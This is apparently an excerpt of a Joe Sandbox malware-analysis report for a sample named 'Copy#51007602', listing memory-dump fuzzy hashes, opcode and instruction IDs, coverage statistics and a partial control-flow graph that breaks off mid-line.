                                                • Source File: 00000002.00000002.3255348099.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 5c4020ded652e2e6fbcf1c57aa59dee196d4657ee034daa9fc6cc686e64c15d1
                                                • Instruction ID: 312254d82c3f85508ed1b28b131c50587f07733c353514c167519355cc6aca5d
                                                • Opcode Fuzzy Hash: 5c4020ded652e2e6fbcf1c57aa59dee196d4657ee034daa9fc6cc686e64c15d1
                                                • Instruction Fuzzy Hash: 1511DFB5C002498FCB20DF9AC444B9EFBF9EF89714F15851AD429A7210D379A545CFA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: XPbq
                                                • API String ID: 0-864591470
                                                • Opcode ID: db8c6bfe278a736f8d186498a4da8a97b531fbe7addf1223b6a2e6bb1ac06291
                                                • Instruction ID: 207ded80dab514e992ef9423521c846f4608bf091af2ba46eff8515ea7271663
                                                • Opcode Fuzzy Hash: db8c6bfe278a736f8d186498a4da8a97b531fbe7addf1223b6a2e6bb1ac06291
                                                • Instruction Fuzzy Hash: A3416D74F002099FDB549FA9C854B9EBAF6FF88700F208529E109AB395DA759C01CB91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PH]q
                                                • API String ID: 0-3168235125
                                                • Opcode ID: 84856335ca688db7e4a9ed4d71b07a767cb5f514103a311978e4511363c61d3e
                                                • Instruction ID: a310978c69b6ec17fd3ae08367040d846c5fb2854c24249906e492ab3bfbc036
                                                • Opcode Fuzzy Hash: 84856335ca688db7e4a9ed4d71b07a767cb5f514103a311978e4511363c61d3e
                                                • Instruction Fuzzy Hash: CE41BF30E0020ADFDB64DF69D45469EBBB6FF85340F20842AE405E7744EB74E946CB91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PH]q
                                                • API String ID: 0-3168235125
                                                • Opcode ID: 25e1799fffe07a93ad0f3d16ea1119a2486e95e47719ecadc5b70a2f02ee0495
                                                • Instruction ID: ff72649de8956d365df3eb1c5d186f9a528e8fb09a0a93dc51dd9e5e9716c2d0
                                                • Opcode Fuzzy Hash: 25e1799fffe07a93ad0f3d16ea1119a2486e95e47719ecadc5b70a2f02ee0495
                                                • Instruction Fuzzy Hash: 29419D70E0020A9FDB65CF65D444A9EBBB6FF85340F10852AE405EB744EB74E846CB91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PH]q
                                                • API String ID: 0-3168235125
                                                • Opcode ID: eae2533f330f596ec0f1c8721be09eab020790972140dd75dad93f9df8a2eaf9
                                                • Instruction ID: 8e4514ad2d574f5f1cd12054bd778580b70db45b9689481c951fc5fd8898b25b
                                                • Opcode Fuzzy Hash: eae2533f330f596ec0f1c8721be09eab020790972140dd75dad93f9df8a2eaf9
                                                • Instruction Fuzzy Hash: 86412530F002058FEB599B78D81466E7FABEF85210F548479D406DB395EE39CE46CBA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PH]q
                                                • API String ID: 0-3168235125
                                                • Opcode ID: 1d8777d5cbe180bdfea40c2e6a8e91032a88d171c84e5cfdc2c0dc3d32454f05
                                                • Instruction ID: f40b246d9d42bd4ce5102e9faa6bf6229a19e7ff85c7155d8def64ec88319db8
                                                • Opcode Fuzzy Hash: 1d8777d5cbe180bdfea40c2e6a8e91032a88d171c84e5cfdc2c0dc3d32454f05
                                                • Instruction Fuzzy Hash: B5311030F002058FDB589B78D41466F7BEBAF88210F608438D406DB399EE74DE46CB95
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $]q
                                                • API String ID: 0-1007455737
                                                • Opcode ID: 5645e1bfed265190c2a639e68f60e4a9adfb45a2875cd27002b9b49f2d9473ad
                                                • Instruction ID: 1b47d08b9ffd42f80a6baec4ee2e2264d2a857b03b39089b3b2e497d1cbcd719
                                                • Opcode Fuzzy Hash: 5645e1bfed265190c2a639e68f60e4a9adfb45a2875cd27002b9b49f2d9473ad
                                                • Instruction Fuzzy Hash: EEF08236F00214DFDF74EE44E4466ACBFB1FB40291F584462C824A7150D3349D86C751
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c6c7c62a5b1d7ad1c30eb74c8e822b34d440380e4c6673d4d06edde2df9869e5
                                                • Instruction ID: e8599cb46a2f3a2a993b5b40fcbca56d518082f2b8fd657ed73067b654798e6d
                                                • Opcode Fuzzy Hash: c6c7c62a5b1d7ad1c30eb74c8e822b34d440380e4c6673d4d06edde2df9869e5
                                                • Instruction Fuzzy Hash: 63A16470F002099FDF64CBADD6947AEBBB6EF85310F604825E409DB395DA39DC418B52
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f07f2ee571cad4578eb391dd73159c1f59643da66f8cac832c1c15f11d69cb90
                                                • Instruction ID: 4c9c8a898e59d610a150a54a214377ee03792e71326fd8f2245652d5828a7f43
                                                • Opcode Fuzzy Hash: f07f2ee571cad4578eb391dd73159c1f59643da66f8cac832c1c15f11d69cb90
                                                • Instruction Fuzzy Hash: 0161C071F000154FDF54AA6EC88066FBADBAFE4220B154479D80EDB364DEB9DD0287D2
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 483c2a423f04a241c0637080d744dc6d189ea83a74603dbe7236d1cc8f197582
                                                • Instruction ID: c275af5be42e5ebbebae8b1aeb3f2334a3205ffc437c3e880ae569bd09e0c874
                                                • Opcode Fuzzy Hash: 483c2a423f04a241c0637080d744dc6d189ea83a74603dbe7236d1cc8f197582
                                                • Instruction Fuzzy Hash: 8F814B30F1020A9FDB54DFA9D45479EBBF2AF89304F118529E40ADB395EB34DC468B92
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b5094c1fd028bf8141c4859833e1acd2541cd050fd35ff76c1e3cd76f355bd04
                                                • Instruction ID: 3ea98a1fcaf6afd29ba9369df750684b8ecb45785cd53809cbb06fb9532af0c6
                                                • Opcode Fuzzy Hash: b5094c1fd028bf8141c4859833e1acd2541cd050fd35ff76c1e3cd76f355bd04
                                                • Instruction Fuzzy Hash: 08914E34E002198FDF60DF64C890B9DBBB1FF89304F208599D549AB295EB71AE85CF91
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1849b7b64c48a54b9a5d91801498664eaf145f3fd962f56ca46d4be55f313e06
                                                • Instruction ID: 3dd9a495c26efe3a81cc827ebfbac07170a4b42336f240daab7ed8990cd84f0a
                                                • Opcode Fuzzy Hash: 1849b7b64c48a54b9a5d91801498664eaf145f3fd962f56ca46d4be55f313e06
                                                • Instruction Fuzzy Hash: 51814B30F102099FDB54DFA9D45469EBBF2EF88304F518429E40ADB395EB34EC468B92
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 990f7676d80a2df1af7e1a582db130a85ead7d7f2cf0a80650c3b97d3f1baa9a
                                                • Instruction ID: 729e5c4ace36d617a71c1a9acfe5e9eba7aefd71925f6b73050e8f5a3312d5e5
                                                • Opcode Fuzzy Hash: 990f7676d80a2df1af7e1a582db130a85ead7d7f2cf0a80650c3b97d3f1baa9a
                                                • Instruction Fuzzy Hash: B3913D30E1021A8BDF60DF68C890B9DB7B1FF89304F208699D54DBB255DB70AA85CF91
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f856c657a79699b25d0d275f4facffac092b50eb9339f0332e14eccee51bf833
                                                • Instruction ID: 98682c2708d8fa3134bc6e361f91eb1f300ec318c85b9d34d79fc66d8835b8d4
                                                • Opcode Fuzzy Hash: f856c657a79699b25d0d275f4facffac092b50eb9339f0332e14eccee51bf833
                                                • Instruction Fuzzy Hash: FD711575E002099FDB54DFA9E994A9EBBF6FF88310F148429D009AB355DB34EC46CB50
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 04238aa82d26bb74cc693b16dfaa8657895ae3345ad34865336d7fb35008ac80
                                                • Instruction ID: bbf472e0b61c046b9ed04a9511c4975ac9daff9d0672e07fe4d2e1d72c8d42ba
                                                • Opcode Fuzzy Hash: 04238aa82d26bb74cc693b16dfaa8657895ae3345ad34865336d7fb35008ac80
                                                • Instruction Fuzzy Hash: 16711570E002099FDB54DFA9E994A9EBBF6FF88300F148429D009AB255DB30EC46CB51
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a80911effbaa08514934e6a5e48499cb23ca095b091f8deb40b4468a1686a11a
                                                • Instruction ID: 596490921124f7315dfd47ba01f111667388392efb9ace21c4c1ed78a3b08024
                                                • Opcode Fuzzy Hash: a80911effbaa08514934e6a5e48499cb23ca095b091f8deb40b4468a1686a11a
                                                • Instruction Fuzzy Hash: 7751BF35F02109DFCF24AB78E8486ADBFB2FB84311F10886AE10AD7251DB359D45CB82
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3c05b929b2984b1188791f7c5b3a685e8d12a1b6a1ec9558bdc0fbac3d64ff39
                                                • Instruction ID: eeb7daac38b2f3329872790c300b8042957289f0450f7f522cae91219d96f30c
                                                • Opcode Fuzzy Hash: 3c05b929b2984b1188791f7c5b3a685e8d12a1b6a1ec9558bdc0fbac3d64ff39
                                                • Instruction Fuzzy Hash: E5510B70F113059FEF605A6CE95472F2A5FEB89710F20482AE90AD73E5CE6DCC858792
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a8d2e958fbaea8f28bf626411104dce4bf7d236de70c6d24b918a75963503e20
                                                • Instruction ID: 4c7c7f62f094021823fc28775df7b9f45c8646f45bd566a8560e234fb19c7ff1
                                                • Opcode Fuzzy Hash: a8d2e958fbaea8f28bf626411104dce4bf7d236de70c6d24b918a75963503e20
                                                • Instruction Fuzzy Hash: 8551FA70F112059FEF645A6CE95472F2A5FEB89710F20482AE90AC73E5CD2DCC858392
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 82f9d6c8b4c965fb3b20fb16be88840bc80fcbb0d0cdcbed5cc64bba7f339dc4
                                                • Instruction ID: 1cdfc71c840386b41c17b70a2f82e8f5963ab840d8cb168c5373f6ae0963a24e
                                                • Opcode Fuzzy Hash: 82f9d6c8b4c965fb3b20fb16be88840bc80fcbb0d0cdcbed5cc64bba7f339dc4
                                                • Instruction Fuzzy Hash: 70414F71E006099FDF70CEA9D8C0AAFFBB2FB84314F10492AE216D7650D732E8558B91
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f66c723e5b7077aae5d2590defcc56395881c4095688b890fa13bbe54945b806
                                                • Instruction ID: e8fe4ada51de5508acd567536850365c98120dbba86ce275b9d796b12db42d85
                                                • Opcode Fuzzy Hash: f66c723e5b7077aae5d2590defcc56395881c4095688b890fa13bbe54945b806
                                                • Instruction Fuzzy Hash: 82318035E102059FCB65CFA4D89469EBBF6FF89300F148819E906A7350EB75EE82CB51
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4652b5e773ee27efffd284794cf0487409f41949d4fe3b54280a686cfabf5f5b
                                                • Instruction ID: d94a595817f0894186ec902254a9a0f2daadfcd12deb4e5d1b77fd24ef6dca93
                                                • Opcode Fuzzy Hash: 4652b5e773ee27efffd284794cf0487409f41949d4fe3b54280a686cfabf5f5b
                                                • Instruction Fuzzy Hash: 7431A331E102099BCB54CFA5D894A9EBBF6FF89300F14C419E906E7350EB75AD82CB50
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 683513ea830ae7cf833e5893f00d698c33d3b923688188e0d25efc84aca741c8
                                                • Instruction ID: 2544987a23c8a42d87b58d16b43cd819c1d62e297fc620531ae72e8c42b2a6a9
                                                • Opcode Fuzzy Hash: 683513ea830ae7cf833e5893f00d698c33d3b923688188e0d25efc84aca741c8
                                                • Instruction Fuzzy Hash: 3B216B76F01215AFDB54DFA8E884AEEBBF5EB48710F508025E909E7350DB35D8828B91
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 27a21f88d8318dd30f709e27a36fb08063669a90f39ff30785fbe596fe53c44a
                                                • Instruction ID: 8537af443d9d4e886838b5eba60d5850a87f1ff59e890669392d317a4fe9a3bc
                                                • Opcode Fuzzy Hash: 27a21f88d8318dd30f709e27a36fb08063669a90f39ff30785fbe596fe53c44a
                                                • Instruction Fuzzy Hash: B9218976F01205AFDB50CF6DE884AAEBBF1EB48610F508029E90AE7350E735DC418B91
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3234614851.00000000017ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 017ED000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_17ed000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 60972ce8f4bf38f601dadd0de5f83a851c2d3223ba6c49ea3358281c2ff3b164
                                                • Instruction ID: ab4a186ae399485568804cd3163f449610348848267d81557b188d219618a2e1
                                                • Opcode Fuzzy Hash: 60972ce8f4bf38f601dadd0de5f83a851c2d3223ba6c49ea3358281c2ff3b164
                                                • Instruction Fuzzy Hash: 5121F271504204DFDB25DF98D9C8B26FFE5FB88314F28C5ADD9094B296C33AD446CA62
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f9ea6bb029ad09872d483040620fa507ed221789c9e9c18616e185633911fbd2
                                                • Instruction ID: fb973c658f8d478a7bf05616e66159bf09ce62571e341e2bf321be0ffdf3f45b
                                                • Opcode Fuzzy Hash: f9ea6bb029ad09872d483040620fa507ed221789c9e9c18616e185633911fbd2
                                                • Instruction Fuzzy Hash: D921AC31F100189BDF94DB68E854A9EBBB7EF84320F608439E509EB380DB31ED418B81
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8d499cee866e50a6552cd4ef5ebc0ab7666cd6603a7cfc5e05a54b6f10cf0006
                                                • Instruction ID: f70180c21798e904df86e586e50f374b757286b3922d220f66bca9007d57327c
                                                • Opcode Fuzzy Hash: 8d499cee866e50a6552cd4ef5ebc0ab7666cd6603a7cfc5e05a54b6f10cf0006
                                                • Instruction Fuzzy Hash: FE01D235B101101FDB6295ADA45871AAFEADFCA720F10846DE509CB391DE19DC428391
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 26ceb7c8c4f83861351b5e55dfad56b1a8a0a58cc84faa49227ec1b14076a5fb
                                                • Instruction ID: 07940fa11783ab29b1b41de76ef24236d9f4219ace3225428255401f07d90ca1
                                                • Opcode Fuzzy Hash: 26ceb7c8c4f83861351b5e55dfad56b1a8a0a58cc84faa49227ec1b14076a5fb
                                                • Instruction Fuzzy Hash: FE11A136F101295FDB54967CDC186AE77FAEBC8210F418139D40AE7340EE65DC068BD1
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 716cd0950df91d081953aa5023f90c0ea58162a66e56a0df7b6aacffbc29f839
                                                • Instruction ID: 5d25515c2a5ecd4a1634224d686aa1787bb24a4081a904080c60376d74dd233c
                                                • Opcode Fuzzy Hash: 716cd0950df91d081953aa5023f90c0ea58162a66e56a0df7b6aacffbc29f839
                                                • Instruction Fuzzy Hash: 6F21E7B5D01219ABCB00DF9AD884ADEFFB8FB49320F50821AE518B7250D7746554CFA5
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fb37b634019d466418312bfa02fa517d6207b7117e00e74610373c0f5c4861e7
                                                • Instruction ID: 793b97826b89a5e3966cdb5baa371ddfff36cb8583be717c54048732340ac1f1
                                                • Opcode Fuzzy Hash: fb37b634019d466418312bfa02fa517d6207b7117e00e74610373c0f5c4861e7
                                                • Instruction Fuzzy Hash: A501B135F141100BCB35953DA868B6B6EEADBCA610F11843AF50ACB340DD14DC0287D2
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3234614851.00000000017ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 017ED000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_17ed000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                • Instruction ID: 7d7ea57a87462152a617127e9d0efed7dff8c43c5d29a7c15b9639df08e27f01
                                                • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                • Instruction Fuzzy Hash: 5811BB75504284CFDB22CF58D5C8B15FFA1FB88314F28C6AAD8494B696C33AD44ACB62
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fa32747bf70d2a1ceeae96f9457daa40320ae91bc60467bf45798f4e1937b8c0
                                                • Instruction ID: 2c7694f9cefa5abe2381cd678228c4633af1ca471630e0e746b30a85c3c7d150
                                                • Opcode Fuzzy Hash: fa32747bf70d2a1ceeae96f9457daa40320ae91bc60467bf45798f4e1937b8c0
                                                • Instruction Fuzzy Hash: 67016172E002189BCF68DB79CC445DEFBF6EB89310F10856AD509E7240EA31DA40CF91
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 48eb81bc81e944ccfb7b6ea5f408fbe5a6df7cf2a51cf901173de1245d68ce3d
                                                • Instruction ID: b805260a9b85dff4b36d3b2c7bdca8f3eca595edfdb7e1d6b56947b6f408cda8
                                                • Opcode Fuzzy Hash: 48eb81bc81e944ccfb7b6ea5f408fbe5a6df7cf2a51cf901173de1245d68ce3d
                                                • Instruction Fuzzy Hash: B211C2B5D01219AFCB00DF9AD884ADEFFB8FB49310F10812AE518A7210C378A544CFA5
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b54758341b93f9d0dad87f798550f577818f12d4fe1701c21389be8be08bd073
                                                • Instruction ID: 5c59e079a4e0cb74c9c252ee557eae17630cdcf3ee8a512e1b73fbe985cb5b7b
                                                • Opcode Fuzzy Hash: b54758341b93f9d0dad87f798550f577818f12d4fe1701c21389be8be08bd073
                                                • Instruction Fuzzy Hash: 8C01D131F100100BDB6499ADE458B2BABDAEBD9720F10843DE20EC7394DE25EC424395
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd

                                                Execution Graph

                                                Execution Coverage:9.9%
                                                Dynamic/Decrypted Code Coverage:78.8%
                                                Signature Coverage:0%
                                                Total number of Nodes:386
                                                Total number of Limit Nodes:8

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1145 5b09768-5b097a5 call 5b09c88 1147 5b097c7-5b097dd call 5b09570 1145->1147 1148 5b097a7-5b097aa 1145->1148 1154 5b09b53-5b09b67 1147->1154 1155 5b097e3-5b097ef 1147->1155 1260 5b097ac call 5b0a080 1148->1260 1261 5b097ac call 5b0a0d8 1148->1261 1151 5b097b2-5b097b4 1151->1147 1152 5b097b6-5b097be 1151->1152 1152->1147 1165 5b09ba7-5b09bb0 1154->1165 1156 5b09920-5b09927 1155->1156 1157 5b097f5-5b097f8 1155->1157 1160 5b09a56-5b09a93 call 5b08f78 call 5b0bf10 1156->1160 1161 5b0992d-5b09936 1156->1161 1158 5b097fb-5b09804 1157->1158 1163 5b09c48 1158->1163 1164 5b0980a-5b0981e 1158->1164 1205 5b09a99-5b09b4a call 5b08f78 1160->1205 1161->1160 1166 5b0993c-5b09a48 call 5b08f78 call 5b09508 call 5b08f78 1161->1166 1173 5b09c4d-5b09c51 1163->1173 1182 5b09910-5b0991a 1164->1182 1183 5b09824-5b098b9 call 5b09570 * 2 call 5b08f78 call 5b09508 call 5b095b0 call 5b09658 call 5b096c0 1164->1183 1167 5b09bb2-5b09bb9 1165->1167 1168 5b09b75-5b09b7e 1165->1168 1256 5b09a53 1166->1256 1257 5b09a4a 1166->1257 1171 5b09c07-5b09c0e 1167->1171 1172 5b09bbb-5b09bfe call 5b08f78 1167->1172 1168->1163 1175 5b09b84-5b09b96 1168->1175 1176 5b09c10-5b09c20 1171->1176 1177 5b09c33-5b09c46 1171->1177 1172->1171 1180 5b09c53 1173->1180 1181 5b09c5c 1173->1181 1192 5b09ba6 1175->1192 1193 5b09b98-5b09b9d 1175->1193 1176->1177 1194 5b09c22-5b09c2a 1176->1194 1177->1173 1180->1181 1190 5b09c5d 1181->1190 1182->1156 1182->1158 1235 5b098d8-5b0990b call 5b096c0 1183->1235 1236 5b098bb-5b098d3 call 5b09658 call 5b08f78 call 5b09228 1183->1236 1190->1190 1192->1165 1262 5b09ba0 call 5b0c6b0 1193->1262 1263 